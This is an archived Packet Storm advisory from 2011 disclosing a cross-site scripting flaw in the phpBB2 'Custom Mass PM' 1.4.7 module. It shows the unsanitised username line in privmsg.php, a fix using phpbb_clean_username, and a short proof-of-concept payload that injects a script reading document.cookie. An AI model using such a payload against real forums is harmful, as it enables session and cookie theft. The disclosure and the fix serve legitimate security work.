exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

PhpBB2 Custom Mass PM 1.4.7 Cross Site Scripting

PhpBB2 Custom Mass PM 1.4.7 Cross Site Scripting
Posted Aug 27, 2011
Authored by Silic0n

PhpBB2 Custom Mass PM module version 1.4.7 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 648c8c5b2c43212ed2869a5a97dd8eba5458cc741457bb3bc41e7d49dbbb1ca9

PhpBB2 Custom Mass PM 1.4.7 Cross Site Scripting

Change Mirror Download
-------------------------------------------------------------------------------
0 | | | | | | TM
1 _______ _ __ ___ ______| |__ __ _ ___| | _____ _ __ _ __ ___| |_
0 |_ / _ \| '_ \ / _ \______| '_ \ / _` |/ __| |/ / _ \ '__| '_ \ / _ \ __|
1 / / (_) | | | | __/ | | | | (_| | (__| < __/ | _| | | | __/ |_
0 /___\___/|_| |_|\___| |_| |_|\__,_|\___|_|\_\___|_|(_)_| |_|\___|\__|
1 0xPrivate 0xSecurity 0xTeam
0 ++++++++++++++++++++++++++++++++++++++++++++++++++++
1 A Placec Of 0days
------------------------------------------------------------------------------

^ Exploit title: PhpBB2 Module "Custom Mass PM" Cross Site Scripting Vulnerability
^ Author : Silic0n (science_media017[At]yahoo.com)
^ MOD Title: Custom mass PM
^ MOD Description: Add mass PM functionnality to group members (or all forums members) for authorized users. Add the possibility for all users to send ordinary PM to multiple users (usernames separated by a semi-colon)
^ MOD Version: 1.4.7
^ Exploit Release: 8/27/2011
^ Vulnearble script: privmsg.php


--------------------
^ Payload
--------------------
0x1 : Goto forum_script/Privmsg.php
0x2 : Username Input Box write Malicious JS eg :<script>alert(document.cookie)</script>

--------------------
^ Vulnearble code
--------------------

$to_username_array = explode (";", $HTTP_POST_VARS['username']);

--------------------
Fix :
--------------------

$to_username = phpbb_clean_username($HTTP_POST_VARS['username']);
$to_username_array = explode (";", $to_username);



Special Thnanks To mafi, Gaurav_raj420 , Exidous , Mr 52 (7) , Dalsim , Zetra , root4o ,
D4rk, Danzel, messsy , Thor ,abronsius ,Nova , jaya ,@ry@n ,entr0py, -[SiLeNtp0is0n]-
,Ne0_Hacker, InX_R00t,DODo(:P) All ZH , DK & G4H members :)

------------
^ Site
------------
www.igniteds.net (ConsoleFx)

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close